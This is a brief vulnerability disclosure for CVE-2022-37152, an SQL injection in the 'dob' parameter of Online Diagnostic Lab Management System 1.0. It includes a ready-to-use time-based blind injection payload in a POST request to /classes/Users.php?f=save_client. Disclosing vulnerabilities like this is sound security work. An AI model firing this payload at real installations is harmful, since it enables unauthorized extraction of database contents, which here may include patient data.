Headline
CVE-2022-37152: GitHub - Fjowel/CVE-2022-37152: An SQL injection was discovered inOnline Diagnostic Lab Management System
An issue was discovered in Online Diagnostic Lab Management System 1.0, There is a SQL injection vulnerability via “dob” parameter in “/classes/Users.php?f=save_client”
CVE-2022-37152
An SQL injection was discovered inOnline Diagnostic Lab Management System
Vul name: SQL Injection of OLDMS
Affected Product: Online Diagnostic Lab Management System v1.0
Affected or fixed version(s): At present, the manufacturer has not released an upgrade patch to fix this security problem
Vul Type:SQL Injection
Impact: A SQL injection vulnerability was find in OLDMS, it could be used to get database information by unauthorized attackers
vul page: /odlms/classes/Users.php?f=save_client
payload: POST /odlms/classes/Users.php?f=save_client HTTP/1.1 Content-Disposition: form-data; name="dob" 2022-07-19’+(SELECT 0x4F4C7572 WHERE 1915=1915 AND (SELECT 1784 FROM (SELECT(SLEEP(5)))HMuY))+’
Source Code: https://www.sourcecodester.com/php/15129/online-diagnostic-lab-management-system-php-free-source-code.html